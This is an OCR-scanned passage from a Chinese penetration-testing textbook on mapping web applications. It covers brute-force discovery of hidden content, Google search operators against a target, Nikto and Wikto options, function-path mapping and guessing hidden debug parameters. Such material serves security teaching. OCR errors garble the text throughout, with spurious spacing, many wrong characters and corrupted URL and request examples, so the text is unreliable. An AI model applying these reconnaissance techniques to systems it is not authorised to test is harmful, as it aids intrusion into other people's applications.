(3) 有 时 候 ， 不 同 内 容 的 命名 方案 使 用 数字 和 日 期 作为 标识 符 ， 通 过 它们 可 轻易 推测 出 隐 
藏 的 内 容 。 静 态 内 容 〈 而 非 动态 脚本 ) 常常 采用 这 种 命名 方式 。 例 如 ， 如 果 一 家 公司 的 Web 站 
点 含有 AnnualReport2009.pdf 和 AnnualReport2010.pdf 这 两 个 文件 的 链接 ， 应 该 可 以 立即 确定 接 
下 来 的 报告 名 称 。 令 人 难以 置信 的 是 , 一 些 公司 在 公布 金融 结果 之 前 ,常常 会 将 包含 金融 信息 
的 文件 放 在 Web 服 务 锅 上， 有 些 精 明 的 新 闻 记 者 往往 能 够 根据 其 在 前 些 年 使 用 的 命名 方案 ， 发 
De 

(4) 检查 所 有 客户 端 代码 ,如 HTTP 和 JavaScript, 确定 任何 与 隐藏 服务 需 端 内 容 有 关 的 线索 。 
这 些 代码 包括 与 受 保 护 或 没有 建立 链接 功能 有 关 的 HIML 注 释 以 及 包含 禁用 SUBMIT 元 素 的 
HTML 表 单 等 。 通常 , 注释 由 生成 Web 内 容 的 软件 目 动 生成 , 或 者 由 应 用 程序 运行 的 平台 生成 。 
参考 服务 帮 问 包含 文件 之 类 的 内 容 也 特别 有 用 。 这些 文件 可 被 公众 下 载 , 并 且 可 能 包含 高 度 敏 
感 的 信息 ( 如 数据 库 连接 字符 串 和 密码 )。 为 外 ， 开 发 者 的 注释 中 可 能 包含 各 种 有 用 的 信息 ， 
如 数据 库 名 称 、 后 端 组 件 引用 、SQL 碍 询 字 符 串 等 。 厚 客户 端 组 件 〈《 如 Java applet 和 ActiveX 控 
件 ) 也 可 能 包含 可 供 利 用 的 敏感 数据 。 请 参阅 第 15 划 了解 应 用 程序 揭示 自身 信息 的 其 他 方式 。 

(5) 把 已 经 枚 举 出 的 内 容 添 加 到 其 他 根据 这 些 列表 项 推测 出 来 的 名 称 中 ， 并 将 文件 扩展 光 
列表 添加 到 txt、bak、src、inc 和 old 这 些 稍 用 扩展 名 中 ,它们 也 许 能 够 披露 现 有 页 面 备份 版 本 
的 来 源 以 及 与 所 使 用 的 开发 语言 有 关 的 扩展 名 ,如 .Java 和 .cs; 这 些 扩 展 名 可 能 揭示 已 经 被 编译 
到 现 有 页 面 的 来 源 文件 ( 请 参阅 本 划 后 面 的 提示 ， 了 人 解 如 何 确 定 所 使 用 的 技术 )。 

(6) 搜索 开发 者 工具 和 文件 编辑 需 不 经 意 建立 的 临时 文件 。 例 如 .DS _ Store 文件， 其 中 包含 
一 个 OS X 目 录 索 引 ， 或 者 file.php~1， 它 是 编辑 file.php 时 临时 创建 的 文件 ， 或 者 大 量 软件 工具 
使 用 的 tmp 文件 

(7) 进一步 执行 自动 操作 ， 结 合 日 录 、 文 件 词 干 和 文件 扩展 名 列表 请 求 大 量 潜在 的 资源 。 
例如 , 在 特定 的 目录 中 , 请 求 每 个 文件 词 干 和 每 个 文件 扩展 名 ; 或 者 请 求 每 个 目录 名 作为 已 知 
目录 的 于 目录 。 

(8) 如 有 果 确 定 应 用 程序 使 用 一 种 统一 的 命名 方案， 考虑 在 此 基础 上 执行 更 有 和 针对 性 的 蛋 力 
测试 ,例如 , 如 果 已 知 AddDocument.jsp 和 ViewDocument.jsp 存 在 , 就 可 以 建立 一 个 操作 列表 ( 编 
辑 、 删 除 、 新 建 等 ) 并 请 求 XxxDocument.jsp。 此 外 ， 还 可 以 建立 项 目 类 型 ( 用户、 账户 、 文 
件 等 ) 并 请 求 AddXxx.jsp。 

(9) 以 新 枚 举 的 内 容 和 模式 作为 深入 用 户 指 定 抓 取 操 作 的 基础 , 反复 执行 上 述 每 一 个 步骤 ， 
继续 执行 目 动 内 容 查 找 。 所 采取 的 操作 只 受到 想象 力 、 可 用 时 间 以 及 在 所 针对 的 应 用 程序 中 发 
现 隐 蕊 内 容 的 重要 性 的 限制 。 
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注解 ”使 用 Burp Intruder Pro 的 “内 容 查 找 ”( Content Discovery ) 功能 可 以 自动 完成 我 
们 迄今 为 止 介绍 的 大 多 数 任 务 。 在 使 用 浏览 器 手动 解析 应 用 程序 的 可 见 内 容 后 ， 可 以 
选择 Burp 站 点 地 图 的 一 个 或 多 个 分 支 ， 并 对 这 些 分 支 启 动 内 容 查 找 会 话 。 
党 试 查找 新 内 容 时 ，Burp 使 用 以 下 技巧 : 

口 使 用 内 置 的 常用 文件 名 和 目录 名 列表 实施 变 力 攻击 ; 

口 基于 在 目标 应 用 程序 中 观 宗 到 的 资源 名 称 动 态 生 成 单词 表 ; 

口 推断 包含 数字 和 日 期 的 资源 名 称 ; 

口 基于 已 确定 的 资源 测试 其 他 文件 扩展 名 ; 

口 从 查找 到 的 内 容 中 进行 抓 取 ; 

口 自动 识别 有 效 或 无 效 响 应 ， 以 减少 错误 警报 。 

所 有 操作 均 以 递归 方式 执行 , 在 发 现 新 的 应 用 程序 内 容 后 , 将 安排 新 的 查找 任务 。 
图 4-8 显 示 了 一 个 正在 进行 的 针对 EIS 应 用 程序 的 内 容 查 找 会 话 。 








4 content discovery: http://eis/pub/media/100/ 





”control config | site map 


| | session running 


requests made: 

bytes transferred: 

erTOTS: 

tasks queued: 

spider requests oueued: 
IESpoNSes UUEUCY for analysis 


queued tasks: 








path task | Teguests 
14 


ipubimedia/100/! iTest observed file names with custom extensions 
ipubimedia/100/ iTest observed directory names 

ipubimedia/100/! iTest shortfile list with custom extensions 
ipub/imedia/100/ Test short directory list 
ipubimedia/100/! iTest extension variants on history 
ipub/imedia/100/ ITest extension variants on add 
jpubjimedia/100/ Test extension variants on delete 












































图 4-8 ”一 个 正在 进行 的 针对 EIS 应 用 程序 的 内 容 查找 会 话 


提示 “在 执行 自动 内 容 查找 任务 时 ，OWASP 发 起 的 DirBuster 项 目 也 是 一 个 有 用 的 资 
源 ， 其 中 包含 大 量 以 出 现 频率 排序 的 、 在 现实 世界 的 应 用 程序 中 发 现 的 目录 名 列表 。 





3. 利用 公共 信息 

应 用 程序 的 一 些 内 容 与 功能 现在 可 能 并 没有 与 主要 内 容 建 立 链接 , 但 过 去 曾经 存在 链接 。 在 
这 种 情况 下 , 各 种 历史 记录 中 可 能 仍然 保存 隐藏 内 容 的 引用 。 我 们 可 以 利用 两 类 主要 的 公共 资源 
查找 隐藏 的 内 容 。 

D 搜索 引擎 ， 如 Google。 这 些 搜索 引 稳 中 保存 有 其 使 用 的 强大 扑 虫 所 发 现 的 所 有 内 容 的 详细 
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目录 ， 并 且 将 这 些 内 容 保存 在 绥 存 中 ， 即 使 原始 内 容 已 被 删除 ， 绥 存 中 的 内 容 仍然 不 变 。 
口 Web 档 案 ， 如 www.archive.org 上 的 WayBack Machine。 这 些 档 案 保存 大 量 Web 站 点 的 历史 
记录 。 许 多 时 候 允 许 用 户 浏 览 某 个 站 点 从 几 年 前 到 现在 于 不 同时 期 彻底 复制 的 站 点 快照 。 
除 过 去 已 经 链接 的 内 容 外 , 这些 资源 中 还 可 能 包含 第 三 方 站 点 , 而 非 目 标 应 用 程序 本 和 映 链 接 
内 容 的 引用 。 例如 ,一些 应 用 程序 中 包含 仪 可 由 其 商业 合作 伙伴 使 用 的 限制 性 功能 。 这些 合作 伙 
伴 可 能 会 以 应 用 程序 无 法 预料 的 方式 披露 上 述 功能 。 























渗透 测试 步骤 
(1) 使 用 几 种 不 同 的 搜索 引擎 和 Web 档 案 查 找 它 们 编 人 索引 或 保存 的 关于 所 攻击 的 应 用 程 
序 的 内 容 。 











(2) 查询 搜索 引擎 时 ， 可 以 使 用 各 种 高 级 技巧 提高 搜索 效率 。 以 下 建议 适用 于 Google (可 
以 在 其 他 引擎 中 选择 “高 级 搜索 ”找到 对 应 的 查询 )。 

D site:www.wahh-target.com。 它 将 返回 Google 引 用 的 每 一 个 目标 站 点 资源 。 

D site:www.wahh-target.com login。 它 将 返回 所 有 包含 login 表 达 式 的 页 面 。 
在 大 型 而 复杂 的 应 用 程序 中 , 这 个 技巧 可 用 于 迅速 定位 感 兴趣 的 资源 , 如 站 点 地 图 、 
密码 重 设 功能 、 管 理 玉音 等 。 

口 Link:www.wahh-tardet.com。 它 将 返回 其 他 Web 站 点 和 应 用 程序 中 所 有 包含 目 
标 站 点 链接 的 页 面 。 其 中 包括 过 去 内 容 的 链接 或 仅 第 三 方 可 用 的 功能 ， 如 合作 伙伴 
链接 。 

口 related:www.wahh-target.com。 它 将 返回 与 目标 站 点 “相似 ”的 页 面 ， 因 此 
可 能 包含 大 量 无 天 的 资料 。 但 是 ， 其 中 也 可 能 包含 在 其 他 站 点 与 目标 有 关 的 讨论 ， 
它们 可 能 会 有 帮助 。 

(3) 每 次 搜索 时 ， 不 仅 在 Google 的 默认 Web 部 分 进行 搜索 ， 还 要 搜索 “ 群 组 ”和 “新 闻 ” 
部 分 ， 它 们 可 能 会 提供 不 同 的 结果 。 

(4) 浏览 到 菏 个 查询 搜索 结果 的 最 后 一 个 页 面 ， 并 选择 “将 省 略 的 结 采 纳入 搜索 范围 后 青 
重新 搜索 ”"。 上 默认 情况 下 ，Google 会 删除 结果 中 它 认 为 与 其 他 页 面 非 第 相似 的 页 面 ， 过 滤 克 长 
的 结 采 。 撤 销 这 一 行为 能 够 发 现 稍 有 不 同 的 页 面 ， 它 们 也 许 有 助 于 攻击 目标 应 用 程序 。 

(5) 查看 感 兴趣 页 面 的 缓存 版 本 ,包括 任何 不 再 在 应 用 程序 中 出 现 的 内 容 。 某 些 情况 下 ， 
搜索 引擎 绥 存 中 可 能 包含 如 有 果 未 通过 里 份 验证 或 付费 就 无 法 下 接 访 问 的 资源 。 

(6) 在 属于 相同 组 织 的 其 他 域名 上 执行 相同 的 查询 ， 这 些 域 名 中 可 能 包含 与 所 攻击 的 应 用 
程序 有 关 的 有 用 信息 。 

如 采 搜 索 结 末 发 现 主 应 用 程序 中 不 再 存 有 链接 的 陈旧 内 容 和 功能 , 它们 可 能 仍然 有 用 。 陈 
日 功 能 中 可 能 包含 应 用 程序 其 他 地 方 并 不 存在 的 汤 洞 。 

即使 陈旧 内 容 已 经 从 现 有 应 用 程序 中 删除 , 但 是 从 搜索 引擎 绥 存 或 Web 档 案 中 发 现 的 相关 信 
县 仍然 可 能 包含 与 应 用 程序 现 有 功能 有 关 的 引用 或 线索 , 它们 可 能 有 助 于 攻击 者 向 其 实施 攻击 。 
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开发 人 员 和 其 他 人 在 因特网 论坛 上 发 表 的 帖子 是 提供 目标 应 用 程序 有 用 信息 的 为 一 个 公共 
来 源 。 因特网 上 有 大 量 软 件 设 计 人 员 和 程序 员 在 其 中 询问 和 回答 技术 问题 的 论坛 。 发 表 在 这 些 论 
坛 上 的 帖子 通 肖 包含 与 应 用 程序 有 关 的 信息 , 攻击 者 可 下 接 对 其 加 以 利用 。 这 些 信息 包括 应 用 程 
序 使 用 的 技术 、 执 行 的 功能 、 在 开发 过 程 中 过 到 的 问题 、 已 知 的 安全 缺陷 、 癌 其 提交 以 帮助 解决 
疑难 的 配置 与 日 志文 件 ， 甚 至 是 源 代 人 码 摘录 。 


























渗透 测试 步 又 


(1) 列 出 所 发 现 的 与 目标 应 用 程序 及 其 开发 有 关 的 每 一 个 姓名 和 电子 邮件 地 址 ， 其 中 应 包 














括 所 有 已 知 的 开发 者 、 在 HTML 源 代码 中 发 现 的 姓名 、 在 公司 主要 Web 站 点 联系 信息 部 分 发 现 
的 姓名 以 及 应 用 程序 本 里 披露 的 所 有 姓名 ( 如 管理 职员 )。 

(2) 使 用 上 文 描述 的 搜索 技巧 ， 搜 索 发 现 的 每 一 个 姓名 ， 查 找 他 们 在 因特网 论坛 上 发 表 的 
所 有 问题 和 答案 。 分 析 发 现 的 所 有 信息 ， 了 解 与 目标 应 用 程序 功能 或 漏洞 有 关 的 线索 。 








4. 利用 Web 服 务 器 

Web 服 务 需 层面 存在 的 漏洞 有 助 于 攻击 者 发 现 Web 应 用 程序 中 并 未 建立 链接 的 内 容 与 功能 。 
例如 ，Web 服 务 硕 软件 中 存在 大 量 的 程序 缺陷 ， 人 允许 攻击 者 枚 举目 录 的 内 容 ， 或 者 获取 服务 套 
可 执行 的 动态 页 面 的 原始 来 源 (请 参阅 第 18 童 了解 这 些 漏洞 的 一 些 实例 以 及 确定 漏洞 的 方法 )。 
如 果 应 用 程序 中 存在 上 述 程序 缺陷 ， 攻 击 者 就 可 以 利用 它 直 接 获 得 应 用 程序 的 所 有 页 面 和 其 他 
资源 。 

许多 Web 服 务 硕 上 默认 包含 有 助 于 攻击 者 对 其 实施 攻击 的 内 容 。 例 如 ， 样 本 和 诊断 性 脚本 中 
可 能 包含 已 知 的 漏洞 ， 或 者 可 被 用 于 某 些 恶意 用 途 的 功能 。 而 且 ， 许 多 Web 应 用 程序 整合 了 销 用 
的 第 三 方 组 件 ， 执 行 各 种 常规 功能 ， 如 购物 车 、 论 坛 或 内 容 管 理 系统 (CMS ) 功能 。 这 些 功能 通 
常安 疙 在 与 Web 根 目录 或 应 用 程序 的 起 始 目 录 相 关 的 固定 位 置 。 

本 质 上 ， 目 动 化 工具 非常 适用 于 执行 上 述 任务 ,许多 自动 化 工具 可 同一 系列 已 知 的 默认 Web 
服务 右 内 容 、 第 三 方 应 用 程序 组 件 和 常用 目录 名 称 发 布 请 求 。 虽然 这 些 工 具 无 法 准确 查 明 任 何 隐 
藏 的 预定 义 功 能 , 但 使 用 它们 往往 有 助 于 查找 其 他 应 用 程序 没有 建立 链接 以 及 有 利于 实施 攻击 的 
资源 。 

Wikto 就 是 许多 能 够 执行 上 述 扫描 的 免费 工具 中 的 一 个 ， 其 中 还 包含 一 个 可 配置 的 亚 力 攻击 
内 容 列 表 。 如 图 4-9 所 示 ， 人 针对 Extreme Internet Shopping 站 点 进行 扫描 时 , 它 可 以 使 用 自己 的 内 部 
单词 表 确 定 一 些 目录 。 由 于 其 中 包含 一 个 常用 Web 应 用 程序 软件 和 脚本 的 大 型 数据 库 ， 因 此 ,， 它 
还 能 确定 以 下 目录 ， 而 攻击 者 通过 自动 或 用 户 驱 动 的 抓 取 却 找 不 到 这 些 目 录 : 

http://eis/phpmyadmin/ 

此 外 ， 虽 然 /gb 目录 已 通过 抓 取 得 以 确定 ， 但 Wikto 确 定 了 以 下 URL: 

/gb/index.php?login=true 


Wikto 检 查 该 URL, 是 因为 gbook PHP 应 用 程序 使 用 该 URL , 而 前 者 包含 一 个 广为人知 的 漏洞 。 
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0.424242424242424 /server-status 

0 /gb/index.php ?ogin=true 
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Jindex_.php?=PHPES568F 
jindex.php?=PHPES568F... 
jindex.php?=PHPES568F... 
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0.0108695652173913 jindex.php?module=MyY_... 

0.01 TRACE /HTTP/T. 

0.01 Index of Nmaoes/ 


Natwork problem - r=try-0 








图 4-9 ”将 Wikto 用 于 查找 内 容 和 某 些 已 知 的 漏洞 


警告 ”和 许多 商业 Web 扫 描 器 一 样 ，Nikto 和 Wikto 之 类 的 工具 包含 大 量 默认 文件 和 目 
录 列 表 ， 因 此 似乎 能 够 很 好 地 完成 大 量 检查 任务 。 人 但是， 这些 检查 大 部 分 都 是 多 余 的 ， 
错误 警报 也 经 常 发 生 。 更 糟糕 的 是 ， 如 果 将 服务 器 配置 为 隐藏 旗 标 、 将 脚本 或 脚本 集 
合 移 至 其 他 目录 、 或 以 自 定义 的 方式 处 理 HTTP 状 态 码 , 还 经 常会 出 现 漏 报 。 为 此 , 通 


常 最 好 是 使 用 Burp Intruder 等 工具 ， 因 为 这 类 工具 可 以 解 译 原始 的 响应 信息 ， 并且 不 会 
误 报 或 汤 报 问题 。 


渗透 测试 步骤 

运行 Nikto 时 可 以 参考 以 下 儿 点 。 

(1) 如 采 认 为 服务 硕 将 Nikto 检 查 的 内 容 保存 在 一 个 非 标准 位 置 ( 如 /cgsi/cgi-bin 而 非 
/cgi-bin )， 可 以 使 用 -root/cgi/ 选 项 指定 这 个 位 置 。 在 使 用 CGI 目 录 的 特殊 情况 下 ， 还 可 
通过 -cgiqdirs 选 项 指定 保存 位 置 。 

(2) 如 果 站 点 使 用 不 返回 HTTP404 状 态 码 的 file not found 定 制 页面 ， 可 以 指定 一 个 特殊 字符 
串 ， 使 用 -404 选 项 标识 这 个 页 面 。 

(3) 注意 ，Nikto 并 不 对 潜在 的 问题 执行 任何 智能 核实 。 因 此 ， 它 往往 会 做 出 错误 诊断 。 请 
手动 核实 由 Nikto 返 回 的 任何 结果 。 

需要 注意 ， 在 使 用 Nikto 之 类 的 工具 时 ， 可 以 使 用 域名 或 I[P 地 址 来 指定 目标 应 用 程序 。 如 
果 某 工具 使 用 IP 地 址 来 访问 一 个 页 面 , 则 此 工具 会 将 该 页 面 上 使 用 域名 的 链接 视 为 属于 不 同 的 
域 ， 因 而 不 会 访问 这 些 链 接 。 这 样 做 是 有 道理 的 ， 因 为 一 些 应 用 程序 属于 虚拟 托管 应 用 程序 ， 
有 多 个 域名 共享 同一 个 IP 地 址 。 因 此 ， 在 配置 相关 工具 时 ， 请 记 住 上 述 事 实 。 
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4.1.4 应 用 程序 页 面 与 功能 路 径 


迄今 为 止 , 我 们 讨论 的 枚 举 技巧 实际 上 由 如 何 概 念 化 和 分 类 Web 应 用 程序 内 容 这 种 特殊 的 动 
机 瞳 中 推动 。 这 种 动机 源 目 于 Web 应 用 程序 出 现 之 前 的 万 维 网 时 代 ， 当 时 的 Web 服 务 仙 是 表态 信 
县 仓库 , 人 们 使 用 实际 为 文件 名 的 URL 获 取 这 类 信息 。 要 公布 Web 内 容 , 只 需 简 单 生 成 一 批 HTML 
文件 并 将 其 复制 到 Web 服 务 硕 上 的 相应 目录 即 可 。 当 用 户 单 击 超 链接 时 ， 他 们 浏览 由 公布 者 创建 
的 文件 ， 通 过 服务 各 上 日 录 树 中 的 文件 名 请 求 每 个 文件 。 

虽然 Web 应 用 程序 的 急速 演变 从 根本 上 改变 了 用 户 与 Web 交 互 的 体验 ,但 上 述 动机 仍然 适用 
于 绝 大 多 数 的 Web 应 用 程序 内 容 和 功能 。 各 种 功能 一 般 通 过 不 同 的 URL 访 问 ， 后 者 通 第 是 执行 该 
项 功能 的 服务 器 端 脚本 的 名 称 。 请 求 参 数 (位 于 URL 查 询 字符 串 或 PosT 请 求 主体 中 ) 并 不 告知 
应 用 程序 执行 何 种 功能 ， 而 是 告知 应 用 程序 在 执行 功能 时 使 用 哪些 信息 。 有 鉴于 此 ， 建 立 基于 
URL 的 解析 方法 可 对 应 用 程序 的 功能 进行 有 效 分 类 。 

在 使 用 REST 风 格 的 URL 的 应 用 程序 中 ，URL 文 件 路 径 的 某 些 部 分 包含 实际 上 用 做 参数 值 的 
字符 早 。 在 这 种 情况 下 ， 通 过 解析 URL， 扑 虫 能 够 解析 应 用 程序 功能 和 这 些 功能 的 已 知 参数 值 
列表 。 

但 是 ,在 某 些 应 用 程序 中 ， 基 于 应 用 程序 “页 面 ”的 动机 并 不 适用 。 尺 管 从 理论 上 说 ,我 们 
可 以 将 任何 应 用 程序 结构 强制 插入 这 种 形式 的 表述 中 。 但 是 , 在 许多 情况 下 ,为 外 一 种 基于 功能 
路 径 的 动机 可 以 更 加 有 效 地 分 类 其 内 容 与 功能 。 以 仅 使 用 以 下 请 求 访 问 的 应 用 程序 为 例 : 

POST /bank.jsp HTTP/1.1 


Host: wahh-bank.com 
Content-Length: 106 
























































servilet=TransfterFunds&method=confirmTransferg&fromAccount=10372918&tc 
ACCOUNt= 
3910852&amount=291 .23&Submit=Ok 


这 里 的 每 个 请 求 对 应 唯一 一 个 URL。 请 求 参数 指定 Java servlet 和 需要 调用 的 方法 ， 告 诉 应 用 
程序 执行 何 种 功能 。 其 他 参数 提供 执行 该 项 功能 所 需 的 信息 。 在 基于 应 用 程序 页 面 的 动机 中 ， 
应 用 程序 明显 只 有 一 种 功能 ， 且 基于 UREL 的 解析 不 会 解释 它 的 功能 。 但 是 ， 如 采 我 们 根据 功能 
路 径 解 析 应 用 程序 ， 就 能 更 加 清楚 地 了 解 应 用 程序 的 有 用 功能 。 图 4-10 是 应 用 程序 功能 路 径 图 的 
一 部 分 。 

即使 在 应 用 基于 应 用 程序 页 面 的 常规 图 不 存在 任何 问题 的 情况 下 , 以 这 种 方式 描述 应 用 程序 
的 功能 通常 更 加 有 用 。 在 URL 使 用 的 目录 结构 中 , 不 同 功能 之 间 的 逻辑 与 依赖 天 系 无 法 一 一 对 应 
起 来 。 但 是 ,无 论 是 对 于 了 解 应 用 程序 的 核心 功能 ,还 是 制订 可 能 的 攻击 方案 ,这些 逻辑 关系 对 
攻击 者 而 言 都 非常 有 用 。 确定 这 些 逻 辑 关 系 后 ,攻击 者 就 能 够 全 面 了 解 应 用 程序 开发 人 员 在 执行 
功能 时 的 期 待 和 假设 ， 并 设法 找到 违背 这 些 假设 、 在 应 用 程序 中 造成 无 法 预料 的 行为 的 方法 。 

在 使 用 请 求 参数 而 非 URL 确 定 功 能 的 应 用 程序 中 , 这 种 方法 对 于 枚 举 应 用 程序 的 功能 会 有 所 
帮助 。 在 前 面 的 示例 中 ,使 用 前 面 讨论 的 内 容 查找 技巧 目前 还 不 可 能 发 现任 何 隐藏 的 内 容 。 那 些 
技巧 需要 根据 应 用 程序 访问 功能 时 实际 使 用 的 机 制 修改 。 







































































WahhBank. 
home 


WahhBank. 
login 


TransferFunds. BillPayment. BillPayment. 
selectAccounts addPayee selectPayee 
TransferFunds. BillPayment. 
enterAmount enterAmount 
TransferFunds. BillPayment. 
confirmTransfer confirmPayment 


图 4-10 Web 应 用 程序 功能 路 径 图 








渗透 测试 步 又 


(1) 确定 所 有 通过 在 参数 中 提交 某 一 功能 的 名 称 ( 如 /admin.jsp?action=editUser ) 





而 非 通 过 请 求 代 表 那 个 功能 的 一 个 特殊 页 面 (如 /admin/editUser. ie, 访问 应 用 程序 功能 
的 情况 。 

(2) 修改 上 述 用 于 查找 URL 相 关内 容 的 自动 化 技巧 , 利用 它 处 理应 用 程序 使 用 的 内 容 - 访 问 
机 制 。 例 如 , 如果 应 用 程序 使 用 参数 指定 servlet 和 方法 名 称 , 首先 确定 它 在 请 求 一 个 无 效 servlet 
或 方法 以 及 请 求 一 个 有 效 方法 与 其 他 无 效 参数 时 的 行为 。 设 法 确定 表示 “ 触 点 ”( 即 有 效 servlet 
和 方法 ) 的 服务 硕 啊 应 的 特点 。 如 采 可 能 , 想 出 办 法 分 两 个 阶段 攻击 这 个 问题 , 首先 枚 举 servlet， 
然后 枚 举 其 中 的 方法 。 对 用 于 查找 URL 相 关内 容 的 技巧 使 用 相似 的 方法 , 列 出 常见 项 目 , 通过 
从 实际 观察 到 的 名 称 进 行 推 上 新， 增加 这 些 项 目 ， 并 根据 项 目 生 成 大 量 请 求 。 

(3) 如 果 可 能 ， 根 据 功 能 路 径 绘 制 一 幅 应 用 程序 内 容 图 ， 说 明 所 有 被 枚 举 的 功能 和 逻辑 路 
径 以 及 它们 之 间 的 依赖 关系 。 
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4.1.5 发现 隐 藏 的 参数 


如 采 应 用 程序 使 用 其 他 参数 以 别 的 方式 控制 其 逻辑 , 那么 它 使 用 请 求 参数 说 明 应 执行 何 种 功 
能 的 情况 束 会 出 现 变 化 。 例 如 ， 如 果 在 URL 的 查询 字符 串 中 加 入 debug=true 参 数 ， 应 用 程序 的 
运作 方式 就 会 发 生 改变 : 它 可 能 会 关闭 某 些 输入 确认 检查 ,允许 用 户 避 开 某 些 访问 控制 或 者 在 啊 
应 中 显示 详细 的 调试 信息 。 许多 时 候 , 我 们 无 法 从 应 用 程序 的 任何 内 容 百 接 推 斯 它 如 何 处 理 这 个 
参数 ( 例如 ， 它 并 不 在 超 链接 的 URL 中 插入 debug=false )。 只 有 通过 猜测 许多 值 ， 才 能 在 提交 
正确 的 值 之 后 了 解 这 个 参数 产生 的 效果 。 




















渗透 测试 步 又 


(1) 使 用 常用 调试 参数 名 称 ( 调试、 测试 、 隐 藏 、 来 源 等 ) 和 常用 值 ( 真 、 是 、 开 通 和 1 














等 ) 列表 ， 癌 一 个 已 知 的 应 用 程序 页 面 和 功能 提出 大 量 请 求 。 重复 执 行 这 一 操作 ， 直 到 浏览 完 
所 有 名 / 值 对 组 合 。 在 POST 请 求 的 URL 查 询 字 符 串 和 消息 主体 中 插入 增加 的 参数 。 

可 以 使 用 多 组 有 效 载 和 荷 和 “集束 炸弹 ”( cluster bomb ) 攻击 类 型 ( 请 参阅 第 14 章 了 解 详细 
信息 )， 通 过 Burp Intruder 执 行 这 一 测试 。 

(2) 监控 收 到 的 全 部 啊 应 , 确定 任何 表明 增加 的 参数 给 应 用 程序 处 理 过 程 造成 影响 的 异常。 

(3) 根据 可 用 时 间 ， 在 许多 不 同 的 页 面 或 功能 中 查找 隐藏 的 参数 。 选 择 开 发 人 员 最 有 可 能 
在 其 中 执行 调试 逻辑 的 功能 ， 如 登录 、 搜 索 、 文 件 上 传 和 下 载 等 。 











4.2 分 析 应 用 程序 


枚 举 尽 可 能 多 的 应 用 程序 内 容 只 是 解析 过 程 的 一 个 方面 。 分 析 应 用 程序 的 功能 、 行为 及 使 用 
的 技术 ， 确 定 它 骏 露 的 关键 受 攻 击 面 ， 并 开始 想 出 办 法 探查 其 中 可 供 利用 的 漏洞 ， 这 项 任务 也 同 
样 重要 。 
值得 研究 的 一 些 重要 方面 如 下 。 
口 应 用 程序 的 核心 功能 : 用 于 特定 目的 时 可 利用 它 执行 的 操作 。 
口 其 他 较为 外 围 的 应 用 程序 行为 ， 包 括 站 外 链接 、 错 误 消 息 、 管 理 与 日 志 功 能 、 重 定 回 使 
用 等 。 
口 核心 安全 机 制 及 其 运作 方式 ， 特 别 是 会 话 状态 、 访 问 欣 制 以 及 验证 机 制 与 文 持 逻 辑 〈 用 
户 注 册 、 密 码 修改 、 账 户 恢复 等 )。 
口 应 用 程序 处 理 用 户 提 交 的 输入 的 所 有 不 同位 置 : 每 个 URL、 查 询 字 符 串 参数 、POST 数 据 、 
cookie 以 及 类 似 内 容 。 
口 客户 端 使 用 的 技术 ,包括 表单 、 客 户 端 脚本 、 厚 客户 端 组 件 〈 Java applet、ActiveX 控 件 和 
Flash ) 和 cookie。 
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口 服务 名 端 使 用 的 技术 ,包括 静态 与 动态 页 面 、 使 用 的 请 求 参 数 类 型 、SSL 使 用 、Web 服 务 
傣 软 件 、 数 据 库 交互 、 电 子 邮 件 系 统 和 其 他 后 端 组 件 。 

口 任何 可 收集 到 的 、 关 于 服务 可 端 应 用 程序 内 部 结构 与 功能 的 其 他 信息 ( 客户 端 可 见 的 功 
能 和 行为 的 后 全 传输 机 制 )。 


4.2.1 确定 用 户 输 入 入 口 点 


在 检查 枚 举 应 用 程序 功能 时 生成 的 HTTP 请 求 的 过 程 中 , 可 以 确定 应 用 程序 获取 用 户 输入 ( 由 
服务 硕 处 理 ) 的 绝 大 部 分 位 置 。 需 要 注意 的 关键 位 置 包 括 以 下 儿 项 。 

D 每 个 URL 子 符 串 ， 包 括 查 询 子 符 串 标记 。 

口 URL 查 询 字 符 串 中 提交 的 每 个 参数 。 

口 PosT 请 求 主体 中 提交 的 每 个 参数 。 

口 每 个 cookie。 

口 极 少 情况 下 可 能 包括 由 应 用 程序 处 理 的 其 他 所 有 HTTP 消 息 头 ， 特 别 是 User-Agent、 

Referer、 Accept.、 Accept-Languagde 和 Host 消 息 头 。 

1. URL 文 件 路 径 

通常 ,查询 字符 串 之 前 的 URL 部 分 并 不 个 视 为 是 进入 点 ,因为 人 们 认为 它们 只 是 服务 全 文件 
系统 上 的 目录 和 文件 的 名 称 。 但 是 ， 在 使 用 REST 风 格 的 UREL 的 应 用 程序 中 ， 查 询 字 符 串 之 前 
的 URL 部 分 实际 上 可 以 作为 数据 参数 ,并且 和 进入 点 一 样 重要 ， 因 为 用 户 输入 就 是 查询 字符 串 
本 号 。 

典型 的 REST 风 格 的 URL 可 以 采用 以 下 格式 : 

http://eis/shop/browse/electronics/iPhone3G/ 
在 这 个 示例 中 ， 字 符 串 electronics 和 ipPhone3G 应 被 视 为 存储 搜索 功能 的 参数 。 

同样 ， 在 下 面 这 个 URL 中 : 

http://eis/updates/2010/12/25/my-new-iphone/ 
updates 之 后 的 每 个 URL 组 件 都 可 以 以 REST 方 式 进 行 处 理 。 

根据 URL 结 构 和 应 用 程序 上 下 文 ， 我们 可 以 轻松 确定 使 用 REST 风 格 的 URL 的 应 用 程序 。 但 
是 , 在 解析 应 用 程序 时 ,并 不 存在 必须 体 循 的 固有 标准 ， 因 为 用 户 与 应 用 程序 的 交互 方式 通常 由 
应 用 程序 的 开发 者 决定 。 

2. 请 求 参数 

多 数 情况 下 ， 在 URL 查 询 字符 串 、 消 息 主 体 和 HTTP cookie 中 提交 的 参数 都 是 明显 的 用 户 输 
入 进入 点 。 但 是 ,一 些 应 用 程序 并 不 对 这 些 参数 使 用 标准 的 name=value 格 式 ， 而 是 使 用 定制 的 
方案 。 定 制 方案 采用 非 标 准 查 询 字 符 串 标记 和 字段 分 隔 符 ,甚至 可 能 在 参数 数据 中 航 入 其 他 数据 
方案 (如 XML )。 

以 下 是 笔者 在 现实 世界 中 过 到 的 一 些 非 标准 参数 格式 实例 : 

UD /dir/file;foo=bar&tfoo2=bar2; 
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D /dir/file?foo=barsfoo2=bar2; 

DD /dir/file/foo%3dbar%$26foo2%3dbar2; 

Ddir/foo.bar/file; 

D /dir/foo=bar/file; 

D /dir/file?param=foo:bar; 

UD /dir/file?data=%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffo02%3e。 

如 采 应 用 程序 使 用 非 标 准 的 查询 字符 串 格 式 , 那么 在 探查 其 中 是 否 存在 各 种 第 见 的 漏洞 时 必 
须 考虑 到 这 种 情况 。 例 如 , 测试 上 面 最 后 一 个 URL 时 ， 如 果 和 忽略 定制 格式 , 认为 其 仅 包含 一 个 名 
